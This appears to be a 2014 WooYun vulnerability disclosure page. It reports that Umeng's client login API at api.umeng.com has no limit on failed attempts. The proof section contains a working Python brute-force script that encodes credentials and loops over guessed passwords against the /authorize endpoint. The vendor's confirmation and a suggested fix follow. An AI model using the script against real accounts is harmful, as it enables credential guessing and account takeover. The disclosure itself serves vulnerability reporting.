当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054815

漏洞标题:友盟客户端登陆接口存在暴力破解

相关厂商:友盟

漏洞作者: evil_root

提交时间:2014-03-28 17:10

修复时间:2014-05-12 17:11

公开时间:2014-05-12 17:11

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-28: 细节已通知厂商并且等待厂商处理中
2014-03-28: 厂商已经确认,细节仅向厂商公开
2014-04-07: 细节向核心白帽子及相关领域专家公开
2014-04-17: 细节向普通白帽子公开
2014-04-27: 细节向实习白帽子公开
2014-05-12: 细节向公众公开

简要描述:

友盟客户端登陆接口存在暴力破解

详细说明:

由于登陆协议比较简单且没有对登陆失败次数做限制导致存在暴力破解漏洞,如果添加之前csdn被脱的数据库估计也有不少开发者要中招。

漏洞证明:

#!/usr/bin/python
from urllib import urlencode
import httplib
import base64
def encode(username, password):
base64_string = base64.encodestring(username + ":" + password)
encrypt_string = ''
for chr_code in base64_string :
encrypt_string += chr(ord(chr_code)+1)
return encrypt_string
def login(encode):
headers = {
"User-Agent": "Apache-HttpClient/UNAVAILABLE (java 1.4)",
"Content-Type": "application/x-www-form-urlencoded",
"Host": "api.umeng.com"}
con = httplib.HTTPConnection("api.umeng.com")
params = {"auth" : encode}
encode_params = urlencode(params)
con.request("POST", "/authorize",encode_params,headers)
response = con.getresponse()
return response.status

if __name__ == '__main__' :
username = "xxx@xxx.com"
passwords = ("000000","111111","222222","333333","444444","555555","666666","777777","888888","999999","password here")

for password in passwords :
print "trying " + password
if login(encode(username,password)) == 200:
print username + "'s password is " + password
break
else :
print "brut failed!"

修复方案:

添加登陆失败次数限制,或者添加验证码

版权声明:转载请注明来源 evil_root@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-28 17:19

厂商回复:

多谢,我们会尽快处理。

最新状态:

暂无


漏洞评价:

评论